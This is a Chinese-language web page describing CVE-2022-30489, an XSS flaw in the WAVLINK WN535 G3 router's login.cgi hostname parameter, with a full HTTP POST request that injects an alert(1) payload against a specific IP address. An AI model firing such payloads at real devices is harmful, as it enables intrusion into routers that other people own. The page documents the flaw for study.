破绽描绘

WAVLINK WN535 G3 经过/cgi-bin/login.cgi.National Vulnerability Database 中的主机名参数被发现包含一个跨站点脚本(XSS)破绽。CVE-2022-30489

影响版本

WAVLINK WN535G3

破绽复现

有效载荷

POST /cgi-bin/login.cgi HTTP/1.1

Host: 98.127.66.193 

Content-Length: 255 

Cache-Control: max-age=0 

Upgrade-Insecure-Requests: 1 

Origin: http://98.127.66.193 

Content-Type: application/x-www-form-urlencoded 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 

Referer: http://98.127.66.193/ 

Accept-Encoding: gzip, deflate 

Accept-Language: zh-CN,zh;q=0.9 

Connection: close 



newUI=1&page=login&username=admin&langChange=0&ipaddr=171.113.240.243&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")&lt;/&gt;&lt;&gt;alert(1)&lt;/&gt;&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn

------本页内容已结束，喜欢请分享------

感谢您的来访，获取更多精彩文章请收藏本站。

本站网络名称： 孤勇者社区

本站永久网址： https://www.gyzsq.com

网站侵权说明：本网站的文章部分内容可能来源于网络，仅供大家学习与参考，如有侵权，请联系站长QQ324470778删除处理。
1 本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
2 本站一律禁止以任何方式发布或转载任何违法的相关信息，访客发现请向站长举报
3 本站资源大多存储在云盘，如发现链接失效，请联系我们我们会第一时间更新。

THE END